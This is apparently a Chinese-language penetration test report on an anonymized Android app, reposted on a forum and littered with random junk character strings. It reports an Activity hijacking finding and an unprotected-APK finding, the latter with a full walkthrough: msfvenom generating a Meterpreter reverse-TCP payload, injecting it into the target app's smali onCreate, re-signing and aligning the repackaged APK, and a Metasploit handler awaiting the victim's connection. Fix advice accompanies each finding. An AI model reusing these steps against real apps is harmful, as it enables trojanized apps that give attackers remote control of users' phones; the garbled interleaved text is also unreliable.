- W N& @& v, n* b' g0 }- h) |) @ $ {9 N$ B4 q* b2 w7 k2 p% } 1-2 测试结果 . o- q" h7 z+ w/ E% A) _, t 2 K2 e0 b- c+ O: f) a( z

+ O( ~. Z: _$ k/ u$ B0 p, \7 ]/ v+ W! ?9 H

8 U% d8 s. K8 Y p : U; ]8 O0 v7 N5 J. _4 q8 n   / x z8 N' k9 Z% F6 m' i7 K" S: E4 k/ I + }* X" N0 ]' P: E4 e7 N9 N

% M) g: Q. {5 W0 ~6 d 7 z0 U1 ~3 ]9 L

+ c! l. B$ c U, u! E9 m4 J/ R & ~) q3 [/ Q5 D, b& c 2 检测结果                    - i/ x; v6 q% A: V( d# N , [2 M* D: S8 G. H

, a+ t& z4 `0 O2 P0 H/ j7 y8 ^( g ' J+ D/ Z& W" L% Z- n# D

1 l7 k: i6 \) p8 i( I8 { * n# m8 W! x9 S2 J; O: u- Z* L, n1 V 2.1 某某某 3 p$ G! Y! }4 ^; s% q ' G+ L$ S3 [6 P/ y7 T! }( _. e

. o9 u- p" h6 t- g/ U W " y/ f/ f& f# O' u$ V2 P; l: u

8 H7 H% ^4 z+ [* ]. i ) s2 u' T, g: o+ C 2.1.1检测目标 0 M: A5 ?0 x2 X : _2 v% g( W1 G2 f! n

7 n' h6 k5 u m % i# ~1 b3 m' t- }

, e/ M; Z4 b$ Z# l* d& T6 X; B0 ?8 |8 C$ _9 u% s1 c& c4 o 目标地址: 某某某某某某APP 4 A0 H: m2 c. {8 d7 {) f + ]; z n5 N! |" N' P% p8 G( c

( n* `# n) D: Q* g* d& K $ |4 q: P% d6 i/ ^4 _) `

- `1 d r% d2 Z, q, H/ ? 1 o! S D9 S8 q! E6 [4 U 2.1.2检测结果 ! \, ^" u8 T0 H+ E- o e3 [9 S5 b- l- s* \2 e' J

% V4 H, l! d7 i1 w& F ' M+ y- r$ _$ _3 j$ O! N' |5 i

4 n; l6 Y0 n( V( B+ U* ?9 m& z8 Z2 S: s( \* @& N4 R2 B 2.1.2.1 " p& \8 c: h) k5 @ " X9 l- p0 z2 p! a, k* u

, z: S" q G6 h % e7 S" N p2 g! ]& c) G

* B9 n& B2 J V" |4 w, R# |+ J# i3 F 漏洞链接地址:某某某某某某APP $ \& ]! o6 w' u3 u ( N! S+ I: G0 \: _4 e8 X

0 \: ?" q2 p. e, O$ t. ? Q + i$ x1 d, M, V; h' G" b

& D" G* }# D; C5 f4 K' s- V+ Z& S$ P! ^) r6 ?+ q7 N6 f+ B   ) D4 U( D& O \: Y% f2 o5 i9 v! C

. [; a8 j! x6 P0 N% X' b - [* `' w5 x7 Y. x G8 | U

W$ r8 D( m: J; A3 B - [! V4 T$ O! J! n- T 漏洞分析及取证: 3 a9 ~8 d" t5 F1 G8 o7 ^ 3 S6 T$ `7 g. {

0 r/ G3 `- [2 U" @+ E9 f6 e: B, z ; f$ q& ^8 M C7 a6 D

) Y% f# z5 a; W- t% t/ `) m; v- \/ U- P" N                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 3 d; R0 y: G4 l( P2 l9 g # F# U- l5 j$ q* R3 }' v: w

) x3 C, q% E( R; F5 Q) i2 C - C e) X H# A; f) B/ R

6 ^8 Q" H6 N+ x+ k3 W% s/ H# ~/ h3 S- v+ G( h: @2 g) ^      9 x) c S: o2 R* w0 t+ a+ t . {5 O: F; `# o0 f! R/ c8 W; z2 b9 b

4 Z5 ~8 x" N5 U9 A5 F8 c 4 T+ c1 U3 R b, R8 A

7 k/ l' P5 f6 b- o9 f" r/ d% b2 g9 A3 W1 ~: N/ O, x; X! L2 [2 |                       7 w$ c# }* i E/ y* V2 { + o% T3 K. ?1 A) K9 p

3 T9 J3 V$ N3 p4 r % \' Z- M% F0 x V4 v" m

4 b- g/ e& j7 q/ {: [4 w , u1 Y" k; w6 z' Y ; u+ z- O) ]) o7 f- s0 I . {% } A; R% ]! u. K

8 [* h7 {/ l0 p. h, G4 }( D0 p% B, r. `# u, @) M; M

. J b$ ^' ? u; O. e3 d * E% p7 b1 ~/ ?" i - s. b6 s4 V, H! Z" n, B: {+ M ! @! S! T4 c5 ^& ]

G8 b( p+ k6 T3 w Z7 J& ~! \3 U9 H, t

) ~7 R* k* @- q. n9 c# n% M& W6 P) B7 w& I( d3 [ # u1 x( D/ u, v$ I8 ]( A ( Z0 U2 G- y9 M+ i- a

4 I$ m6 m6 r; i$ I0 \- {. N% w! |! N# \! q$ ~

3 F( I: h4 F3 O 7 _! R% Q0 Y8 j# H. ~8 U# a0 o 漏洞危害:高 5 Z& M5 k: ?" u; p F: `* {. ]$ i0 J/ |/ _

# t0 U" j& `, t& K1 z* }+ `) F( x! Z
, ]$ s L" U: ^3 }7 ] 1 c4 W! l. ^6 e: O % e1 y K6 z2 K! b: p, u" M3 @; o9 m& m/ o9 V4 k5 ?: Z9 e4 x: {* J( w. V* e. ` {. y1 R' M) E8 r0 w4 M |, z3 j; j) u# w6 `4 {* V y8 D- C: q$ }: U6 V1 z# L* j% _/ n: Z& M% I4 s0 j2 a) _- T" C( c- F: F- K6 a6 r+ H% M, V7 F9 X% c5 \7 p" O* e7 X/ c' i$ b4 ~( j2 k. M, x5 c. |- B m: T5 x; W2 P, u$ N N# r( Y$ E- r" ]+ T4 M o( [: p7 R/ Z* |& M! R6 Q6 _* }% m1 ^, b# Q' U' G7 W0 ^7 i ]. `" j! w. ]$ J% k, O3 T3 S9 Y! \1 P f( Z$ j0 m/ ^# g9 V5 g; w3 @" j. Y, b8 u3 G" v- j6 k, g" b. @2 S+ G5 N& X+ d4 h' l0 `" k0 f0 o6 M* Q) Z; z3 b9 I5 ?) e( w% ]" C
1 O/ u3 F: Q: e/ B3 J 9 c8 A5 E/ H& T5 c

( {4 V8 z+ v! F9 W ( ^( S3 U! K4 d# [2 f8 G/ d- Y 严重程度 R3 U) D& |3 \# o1 [' a! l . f/ r' ~# ~" h$ Y

% j6 z& z% d9 f' w9 }, `5 C $ b6 R2 b; m6 Y+ p9 o
" ]9 g" p# {2 c1 }5 h& C. o' ~( X# u# f# w0 ~; r

5 l* n, H5 [2 _7 s4 X, q: R* n% k2 f y- n8 l |2 e; z d J# _6 ]& i# X, i6 D6 p0 Y6 g6 c7 e. D" W

2 n% p4 ^3 u3 N6 P 8 f5 P7 C7 v* T$ H* j# p8 m
% ^2 z& X- m3 X9 L& p5 z: Z7 W: y+ t/ k2 s

6 b5 E. B0 u9 c# t+ E! h/ ^+ m5 D& r2 \6 ` 3 K. Z; ?* G) l % \& p# i7 c; I( l0 F+ T4 u& B

2 T4 h2 d! @3 l# a$ v2 K1 R$ n. |- D3 F( z
) R: Z% o# ]: w' q1 C0 }; ] }5 {: M1 t0 z* J- o D) s

) Y7 ]/ a. D4 S) a( o. J0 K9 y7 [( N 8 ~2 w3 |, V% ?5 Y 2 d, a( p% G) p, N / L. {! o- ~+ F. G8 d5 G

: i- _1 r( @! h7 s- E: \1 E 2 G: b. L( }* V! E% w
6 }$ }: {8 n! S% e6 h9 h. _9 T- g) \- ^- k4 o, f4 K

; _7 l2 r% s% [7 A% l( S" ?, w1 x1 G' t" Z" I   % ?) W+ W4 v B0 c- Z! }. W * _+ n) I4 a$ T4 l: D* N. y1 n

3 `1 y2 }9 z1 G0 ^8 M9 C& {' ~# c i' p2 X- p1 P
' l+ H* ~; ~9 F2 t' t1 B- {9 r+ c; w6 R+ x0 k, T1 d5 N

+ l {1 P/ t/ F N- m ( x' G6 ]" ^8 V0 y4 w. P 0 M/ z3 X+ ^# A% r" ` ' i5 z4 _7 E) C: [, _. _8 B6 o5 t

- I1 U* ~5 _, L1 m( G7 Y # h! V$ `1 A; X8 T4 Y( t
# t$ `% Z$ t$ M7 F 9 X1 t' I, k' D: l0 E

# z9 P0 q) X0 H( A8 p5 Z: {. Z* x. N/ s   6 S; o' p$ s5 b3 V. ~3 p/ x * F( F. B# N* A! T3 }

9 t9 V/ J$ B/ J6 {1 E4 _# J % N- y; W \/ C4 O& |" v
, q9 u0 h* a% p8 f g ' h1 {! G3 H/ l
8 l3 O- ]$ f5 R# x3 t9 K9 P/ T# D 1 B, V/ A1 |' Z+ X: n- H- J: ^1 p

+ ]% e) x1 _% T* _( y7 i9 G' k! K) n 1 w9 Q6 Z ?3 k; C- b# Z   + Q" v$ _; q/ h P$ U , s4 Y* d0 B; j6 G, X

& u1 p* F$ Q" c3 z, W- P' r " S F [& @, x/ Y' N. z

+ H7 ~9 U/ B1 `/ O& u 1 ~$ [) Y8 m: |! b' N3 j 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 9 \9 k8 w- A% Q+ q$ R }" F: I* t6 A K# E: a! A( L$ Y

! Q0 \$ o w' W; O3 U& B' Q 0 T0 \, w& X% |1 E# n/ M1 d; D. c

) Q/ G+ E0 t% w' x, F0 U, | ! J' I+ ~7 D) A2 R' P           % m, H2 v, Q4 s 0 |9 N) x* `( S

$ B+ q2 T8 Y3 X1 }* Z, M( N8 r 0 V- w. b5 c* H. B$ w

' D0 J) W1 Y& W$ M* t5 y6 d' R# Y O+ d) p1 D0 b   8 R3 c5 C6 ?: Y. m% g ?0 H% q3 k. {2 o

! k9 c, ^4 m# o* G/ [9 X* U. ?

5 l7 X& {/ f# i$ N# F& o ! w x" u% C6 l 2.1.2.2 8 L. j& b; C, d7 e& U2 V% e 8 O. J' a/ l u

# u/ g( w0 p- `7 e) L: [* E , W' ?/ D. M% H8 p/ X

* D& l: c6 q1 A% Z/ j ; \# k0 L6 r0 r; v- _ 漏洞链接地址:某某某某某某APP $ x" g: Q/ v6 ^. z/ u1 u: x) `2 O V; v. V c" k$ q

8 f# p8 x, s9 O3 S5 v 6 c* K& V, o* y9 N1 T6 \! H

, L# N3 t0 t. ^5 } & e O( `$ ?' {5 e/ [+ z5 o 漏洞分析及取证: 1 k) z& `& X: s7 O 4 i3 _6 m* F3 Y) g& Q: k8 B% s2 o

! H/ p' e$ t9 f% \0 P9 n) v% i+ x 6 Z m1 U8 a/ ]+ q4 d: P: z

) k3 s# z- D+ ^ 3 k% [( l4 f& P0 I! U; V1 b                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ! z5 Y- T/ y g' X3 o. j5 s 2 y; V! d' d$ a) v5 N' v0 N

+ }0 P* p' N: Y/ |+ f+ q" c5 f F: s0 ?

1 g; V/ h4 Z9 x# f8 t3 X/ I' j# _4 h2 O' y8 C& `$ \! A ?+ d Metasploit 生成木马 apk + g! C4 c7 l! E9 b 7 F- K) L7 W# K* C4 b% R

2 C( T! n# X; J+ g+ |0 @) e* U1 k2 F

* z! x* h/ m$ i o { 4 z, X0 l) H: { msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 5 |/ E: p1 G; M& ]$ [ - g I3 o- ~# x5 L* G

& L$ j" }; T3 q' N+ K. T 8 x$ X. t& n2 i" s* S

. i A" d. Q. T0 o: d: Z 5 [$ S& W" y3 t 反编译目标apk和木马apk % r( r' p# L- ]5 v2 z, `& U% q 8 @0 f7 C# t' A% }1 ]

7 C9 x m- a& W3 g2 M& W! c ( }9 q. S* x( ?# y8 {

5 ^ D6 `) N( }, M% }! D4 S$ q" a- l; x& ] apktool d target.apk
+ ~- u2 O i2 H) G. @3 z8 s0 H9 {2 [+ m% g: ?$ z apktool d cockhorse.apk
8 _, i+ ^; I) G% o: R$ r0 K ( y% O- J; n( V8 m$ [# ?. Y6 p

+ ^. h) ~; v$ K1 I* }# y0 ^ 0 M- O, Q4 }+ N. N( B7 o

' q) D3 D: D R7 Z; N) ], [ 9 ]7 ]7 }# Y& z7 Z5 f 木马 apk 注入目标 apk 2 [, l3 n: ~' o* @) B) v8 d, I0 U: O, G& o1 b; Q% }) ?$ T

$ S$ e' N- L% [; z5 X# D; g 3 g4 I4 B) \' [/ e! k. `4 Y

* ~6 M7 F9 s4 q- ]2 O7 G6 D9 o: ]2 S; j4 t 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 Q+ M5 Z) `6 |# I- N6 [! L , u; `* e2 z7 U. _/ T1 z# i' T invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
! ~% \# @& X5 `9 ]% F, `: j " Q3 r) t8 u. K1 g B4 B

" U5 D. c* \$ h( d5 y$ u6 J 6 j+ B( V, i1 _# q* S# l1 g

& t+ `. T0 @, J. E" d& B$ ^ ! K+ L/ e4 r! T" z1 D 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 m( q& w/ ]/ \# o2 X5 v5 _3 r) t% D8 L9 S

/ \6 p. L. [7 z: B8 } - @ B/ l U }5 z! g; M3 u+ p! g# \

- R# Z5 U- ^9 e h: G) r' m $ y6 i( R* a" J0 s% q: h* L 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ! k: K. h" W7 [6 D4 a! J6 B 0 Y( k: }% i# u, n2 I( q

6 y1 }/ s; n% Y : a' M* p% l2 X$ e0 [1 r

- B' u1 V7 H7 [5 o6 H: ` , Z3 \8 F4 k8 J6 q% R0 G0 y; h 回编译生成最终 apk / U. R% L9 ]3 N4 a3 ?; h + ? w- ~6 ~/ d+ q

* i' s5 C9 c2 Z' ~! A+ S6 k6 U* B; _; |

& m$ e0 A# E8 ?3 X+ X 0 j2 z. T) r8 Y+ x+ P. K 重新打包 & I' Z) t( `! j! f9 m! i) | 4 T9 @; f/ u1 @' j7 w* }

1 ?8 ~) h# U8 U4 m- ] ! O7 S- U" c, x ?

. \' S5 z) S8 n3 u9 K: C$ n4 v% {0 z apktool b -o repackage.apk target_app_floder 1 q2 `+ C; d: d9 I) @' D3 r( G4 h( Q" x0 S0 v' @* V+ r

. a. C+ H/ V) S ( X* J; |+ C& @0 B/ ~9 X

4 d" y2 H4 {3 ~: E" t; @5 v ; S" H& J3 N+ M( c( L+ x 创建签名文件,有的话可忽略此步骤 , v$ g* X3 i% O# Q2 i7 G. \( K3 x# D; s8 l: f7 @( C6 X

4 J9 C7 K* P8 k1 e 6 w) ^' W. F* `4 e# H1 N

9 y* b+ g/ z7 V' _/ j2 h9 R" W1 S4 K9 ?" W( m keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                2 H" M& D% F U+ r8 t 5 L4 L6 x0 r: ^9 U. m

! d9 G/ o, x! K0 h; U; d7 ^, G9 C: t0 n& b0 Y, [

, x2 v8 v, \; i- z& s3 \ 0 E# k$ C4 z. R& ]+ j/ i% j1 }: T 签名,以下任选其一 7 `0 y0 A' {, {5 P 0 b3 W: L: ^% f5 ^3 ^( \! R+ I7 o

4 Y t' R4 Z# T+ N% |" @0 z, e2 d5 p& Z' g

: k! M3 S# @& g2 c. |9 c( L9 h 4 Y" l& |* v- b( {' ^ jarsigner 方式 3 @" ?5 S: |) j+ l & T# M A4 G) l3 F5 W

. R" ~& D, U4 T! j- L 5 ] Z; _* E7 _$ Q" ~# q; W. H# @

$ ]8 r7 J- ?! W$ e ( S g: A5 P# c jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 2 f" q7 j% }3 r" N( o' B % m0 d! k5 }! w0 _* B1 d, _

7 V2 z | v" j. C4 ~" v! R' g" h+ i7 [ n8 q6 q3 a6 S3 I

2 N; Q+ e& Y3 \7 u$ `& V7 M 7 G7 j4 J- H5 C! j! u1 P apksigner 方式 , H$ {, `) W6 ?9 r) G9 X6 H ( A9 U/ x, T6 W7 H; ?

8 E+ S& [- F$ L" g# w9 s & |7 m( l0 V' N% V- i4 m8 O

4 t1 W6 t+ r, W8 E6 C: |/ v$ i3 j apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 v0 e' Q! \1 T! w% ~ / M% O/ C) R* v

) v' S# b+ r! r6 T. y, I# P6 M & G2 k; {5 Y2 }9 I7 V* p! w

1 ?" C: v2 I9 _: K' |0 ^: D; | 0 B5 p4 X& B4 Z6 ]8 e* H( D 如需要禁用 v2签名 添加选项--v2-signing-enabled false - D3 h& O* I; u. t; b - ? m2 s. ]+ j+ E3 g* R% s* R9 g

0 W' e6 m4 r/ C5 _. W- S + z1 n e6 M4 P0 l" U2 i

# p/ _( `4 N _" {, w/ r7 f & u/ e1 k- r' ~& J: I$ q 验证,以下任选其一 + ?' C; m; B0 h# N; S( ?3 u( X $ E3 U7 c, k* T* H! U

* k3 r' t: f4 n8 X& n: B$ I' B9 y+ ?0 A4 }0 Z2 O2 T9 B

- W$ b" T' t4 K+ ]. D0 x a7 K; y1 Q) v$ F2 h$ I1 Z. w jarsigner方式 ( F7 M& O9 x# \# W/ A8 D* P: M/ j' f0 F$ n

% z8 y8 M8 X' i/ y- }3 y( ^4 H+ p- A2 I

% L) z# ]3 }& {8 b) p % h7 v# F# C3 N ?, x" l* `7 W4 { jarsigner -verify repackaged.apk ( ~1 V9 B7 u6 q2 q : O z/ J9 @- x& Y7 m

$ `/ q" i; i2 N5 _- ] z ) Y' b5 \: [7 M8 ~1 @$ q" j

9 h8 r% Z) B2 n: y! z/ R) O+ m7 e8 J3 F& m( w$ Y, y+ A4 k apksigner 方式 E1 x7 g, z, _3 u: n6 y & Y) S! k, R% ?" A' y' X5 N

$ y5 ^* A$ \, D: p6 [9 y 1 \# l @& I8 ?2 t

; U1 w1 d- B' k! p B % o9 L3 [) C8 G( ] apksigner verify -v --print-certs repackaged.apk 9 A" ~ x- S, s& i5 B+ R; r9 U ' Z0 Q! G3 M# v' r3 @

9 i* `: ~9 S; w5 J' @( Y * K* [7 j% m9 T. ?4 g/ S

( f6 t0 h8 L) ^0 R2 H ( Z* \* O R2 b' s7 H/ t keytool方式 + l7 Q8 C$ D: O7 T 8 N9 P7 U6 W0 T8 `- k- J7 \

' N9 l: {2 u, _ : ]! c5 b1 x7 U2 O2 T

( y( Q( E, Q* u3 l2 e0 _ 6 U. `" ~! o2 Y1 r$ U4 Z# r keytool -printcert -jarfile repackaged.apk , b% e, f: X: N6 a* d+ X% u8 N& Q8 w* y, p: r$ ~

$ \: z @2 u$ {; W( Y ) C/ L% F0 x8 B- D0 ^% @

. X3 h6 F4 ?7 s# E) p% O , ]5 i/ L. z' I/ n1 c 对齐 * s0 Q- Z. m9 I- s$ B8 O+ p7 w" p) k! L ; @+ @5 ?( ~# G f/ ?. t4 @3 w

/ _% a6 a- R1 t) d5 D3 C0 {" Y 7 I% }/ s6 }* }" D/ y

: b9 q! r6 G) Q7 @6 K# M0 }0 ] ( i8 }& f0 N* C6 G 字节对齐优化 + w# V! P& A. `) ~4 w / ? K( F7 A6 t( ?

4 I# w% `6 t. A2 i% M6 [4 B: V. W N8 T8 ]4 @: V

. ~4 P- q |: c( s' S- Z' W0 P- |% U5 P$ V. D6 D2 v' D zipalign -v 4 repackaged.apk final.apk " j& Z" ?* s0 [, B0 H. f + I2 }: ~, Z) H8 ~

* _: x8 O) [, M8 \: E- i) c+ M2 L 9 Y1 o$ k6 W4 n

/ |2 I0 n, B4 @# y) ]1 f % T% B8 J9 f9 `8 l7 h2 t1 S5 b9 I 检查是否对齐 ; |: ~6 P p+ f: m# S3 ^& L2 z4 |! e; J* {

# L/ k. ]* B* ]; f# a& D 7 w7 y# ?; c- k+ D: S0 y

0 n5 O/ i8 @6 a. F 4 ^: M# H# `0 o, h zipalign -c -v 4 final.apk + y) Q# ~5 q: j# L! p( l. H / G8 z. p# J6 b& [

% e, f7 R& _: C7 @# k + i5 g v+ K& E4 A9 j/ X

/ h# K" ^& d2 I$ \. m% b2 x9 }9 r2 P 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 3 o4 P" C- I$ ]& U5 h5 b- M) N/ g5 R- Y( r% \7 y

" L8 C6 S0 e7 \- o5 J+ g+ [! M 5 r( f2 ^: M2 R+ o! g5 y

7 Q( y* C1 i. J o % I: X: ]+ x; v. q! C1 c 启动Metasploit控制台,配置参数等待上线 6 B2 o0 g! Q3 [% p3 R* W \% v+ ?# q/ X1 @5 I$ `

/ k0 q9 K2 I! s. \4 @; f# V " n; t/ W0 a# n* n- t

: X9 p$ ` E! Z/ e* ~" ]& J- m! s$ n6 K; [3 `6 x1 g8 g 在终端依次输入如下命令 ! ]! M! Y5 H4 {5 I$ v4 ]5 ~2 q# M: R" e/ i' m3 v% e

9 P8 F( l1 @9 ^, D9 A 5 ~0 F, s; }- I! v& b

! O3 v* S- k$ i( O1 C$ c5 H2 T6 s 5 C0 P' E3 ]5 {4 w msfconsole * t9 T" D! R/ _& S 4 @0 q; m9 s/ T& T

5 M2 W8 i5 R" z ( I* \4 f4 b( P8 S. z

- N6 f6 X( L" S% ` - X- x8 Q( n3 S6 h9 ~ use exploit/multi/handler $ R+ Y) w. P" T8 B& P- L# Y; p/ F9 ]* S9 |3 R# I n2 j* b0 s( E

, x1 D) {/ B$ U1 u # k% ?7 E# |3 q- r

1 ~" M1 T1 S% y+ S& Y. s % U/ P8 v% q* \; c( W9 Q# B set PAYLOAD android/meterpreter/reverse_tcp ; n8 J* i, `4 m# S7 C( i: C0 R" d! a: e- T d+ w0 y

: t Y. s4 n) b9 f7 t5 D5 C- X8 O2 \8 ?( B# }1 R& \0 P

) J/ n& O( ?" v7 j 9 X4 s$ e( [1 L' D" o9 C set LHOST 192.xxx.xx.xx 1 t( C/ A) O" s1 Y3 L8 ?6 ^+ d Q- D) U1 A3 U9 o0 F+ y

6 A0 B6 q* C) o* S$ t9 R7 O5 `* }0 s2 ^1 W6 z! f) b

3 v$ Z7 O8 t* K5 V* [# `8 \3 ^4 `1 g8 K R9 U, D' G set LPORT 4444 + p" v2 w4 ?1 `9 A* N0 W% j# }# X/ R. W z6 y: p& M7 Y

7 Q Q0 B& r+ Z# E, O3 e 3 S* V/ @ m/ ~: S) M; `

# f" R& b: H; W* [; ~% A$ F " v( v9 ]/ n. y- m exploit 1 S [$ ^6 B9 ^& D/ E; p" p: C 2 }% {2 L; M5 K) A& u. o* j/ K' h8 ~% J3 K

$ t {1 r' }) f6 ]3 t 5 J& i7 J% l. O2 [# U

, x4 a K& {) { 6 M1 @) F, P; @4 S& D# b! Z 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               % r1 x* Z' H% \, O 2 H' e5 \ o- F! z: T. P% q4 D

* B1 r. E6 t7 C9 Y5 r- W' u 1 n/ R" h' z1 C' v* O

+ s6 Y; ^3 N2 G& H" I% j. @3 r" k9 W 漏洞危害:中 : i9 P; r2 m/ O# Z5 v ; J$ J, A8 |$ h1 S/ w

7 X( G* P5 ]. _ % p4 P0 {1 B9 I5 u. j$ g! S
2 c9 u# F3 w# j4 i9 x; Y4 e9 ^- V) p3 i5 \' H" [- a : Q* G" |8 x& Y8 ]0 F8 w9 ^, S. F' A ) F% {; O4 l. q" o1 E( ^* B7 D, b1 x& _2 M3 v# i. g( y4 Z9 b- E7 d: \1 P1 x: V' [8 X z* [1 \2 y9 c7 x$ }" r. N" Y7 z# [, f; ] Q) _/ l& ~1 ], t+ m1 ~1 d( I2 s# A3 c' V! Q( W# x7 p9 R8 _. f/ T- H" A$ {- ]( P3 o7 |# ~0 U; g: ~- h$ u$ {; |% ?! p- N6 u- z S: n" i0 E C- {! k6 O2 { E: r2 K9 p0 e$ v- ]0 {* t: x! [' j6 m1 s2 _* c" k3 c" |) W1 q7 Z" V# r+ ^% R# f% c) S" D" Z! w' c8 p3 @0 C: G! i, [$ u% c: M" u u$ X) D& g- ]# u- ~4 U* N2 u+ x, V" h# N/ O4 s0 o0 t; L( Q3 H1 ]4 C0 \9 W) ?+ g" R) v: M3 {& M3 X) N( n4 K9 l6 i5 @9 ^! }5 ?7 `3 L+ ^. C$ P1 v9 W' h' w% t
8 C+ a* E2 U2 t$ B1 O7 ^9 u( F' Y* @ * U$ g& ?$ K9 M9 L0 K0 l u

, A9 J n% i+ _ : R6 A( q7 E4 `1 J 严重程度 2 Y- C/ p. p5 J- M 8 @) P. C) ~6 q8 H! G

3 X0 ] B U* q1 }6 } 4 k m0 A5 W: b# _7 m r
0 B& Z, M: X0 u8 I! o 4 ~( J+ c: l# H. c

7 @( T8 ]# t4 U( |6 V, N+ a: B, e, w7 T2 R4 A , r# O" E9 W. y + t/ U, `+ u+ Z2 e) K) r' q

: x9 S0 y: W8 u+ p( i; E# H3 C/ T3 V% [: y9 }
) v& D, l* s Z8 |" A* S' u7 a; {7 l2 @ x+ I8 Y& V7 ?

7 _2 K4 W' I. W& \1 d0 K ) j; D% ]- V! l# Z/ m/ J $ _3 N, T6 a% ?5 C/ q! ^: f& H/ _ 0 @0 I+ k, V, J' ?% y

6 k& y) \" u- o: f K b7 I ! ~& {$ r0 l& I2 v" H
' o+ i& V7 u) r& |; ~, t , M) J1 I+ J' G2 p V" R; d

. r' u" i% }; W) p; P- j+ P/ ^1 U/ O# w0 j+ X 9 [, d: d1 A& ~# N 3 A* c h5 ~" i# |7 \2 ^

8 F$ ]9 F$ q2 ~9 u 6 E% F# R) `- j& ~5 u
% w! h6 w* g! }& [4 _& i( D, `7 t7 G2 c1 v4 t; B) \ " u% R0 g# X' P9 `8 l $ F s7 b2 F9 K+ Q

: z/ c- q/ d! q. Q+ s2 U# W$ f1 E- M   & B5 b% ?# h' S1 N 3 Z4 O/ Q+ Y4 n2 ]

/ N' R4 P V U& |1 w" d 9 @$ u# q+ _$ ?7 T8 x# j4 X
) \% \ q3 K8 o9 s: K. H6 s6 T$ r : v- _6 s7 X( d+ y8 ]% \2 w% _

( v L1 m! n& ^" a! ~2 ~0 X0 w- [2 ~! Q0 q7 K" B* p( l * n' m c" z; k+ v& n. d" i2 e 9 Q& @: Z P; ?, k

6 i% V- X- J/ o' G: E3 b/ u U0 F$ X- m6 e
3 r# Z! Z# R) d4 ? # y! X5 B6 @& H8 G4 H ~! x9 Q+ B/ z$ |+ W/ j7 \/ u! N9 x% f8 o9 n; i5 }

0 l4 [% L( @% z/ r : Y+ R M8 C0 H: ]5 C   : |) i! F: V# A9 ^ 4 w8 E% _ p2 V( o6 W

& C" K( n! ^* e6 a# B/ r % M5 r9 F: k0 |1 _% K3 s
% R) f: w* J3 c0 i! r8 H. Q $ j' r4 K9 U7 |$ b/ X3 z9 J
) o5 ?6 |8 E, J5 l+ V & d( @0 a0 d7 E

9 f: c$ I0 y! S, ?: s+ H* F / M" r; }6 i4 e1 w- t' d( V   \5 e- i2 N8 }& P! B" ]& ]/ W! P. A0 f% E9 R3 i; O

R6 M- h3 |$ s% v' m ! n& z; e8 r( M

! }1 x) _/ h2 c9 _: Z( u" c / A% u$ L% r" q- [3 x5 S* n 修复方法: d" T: {2 q) _% F8 X! L+ H % L# ]( a3 ?6 r3 H' o

5 G" o: x5 H0 E8 F& Y Y/ H: ^# @; @" |4 X" S

5 L9 @ m- ^/ f" O9 _5 \& w6 b/ ?6 M% C4 l1 ]               1. APP 启动时应做签名校验防止二次打包。
! m! k8 ~% |( ~ T" V- ^; t- X" x7 S# ^ 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 7 M% B8 k$ l- f# X7 ~' n 8 s1 I. W y7 K. Y& A

/ `0 c/ @! Q2 k 3 i" r$ F- g3 i) B: B1 { : [; j+ c6 E$ ] - Y }) @+ K+ ^% J2 h

" m! ~2 @2 W d2 t* D7 T& ?0 D. ~$ z- \: x( B: Z2 }   7 w$ Y* g( z$ } {- L4 d& t6 M9 x! K0 g6 ^& I

9 ^" d `) s( f* I% p - g6 p) E- Q! W. h 1 j% X# n. K! |5 ?# F. Y3 `9 V: z O6 W

- a# C$ ^& ]% v0 x" N- a 7 _' Q: y4 c- v; E+ `- H7 S
t0 s7 D6 C; P4 v; R * f4 y& a6 G( G) l2 \# c

; w: C* r( R R: M+ Z/ q$ Z , M( M2 [0 Z1 i7 b6 g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表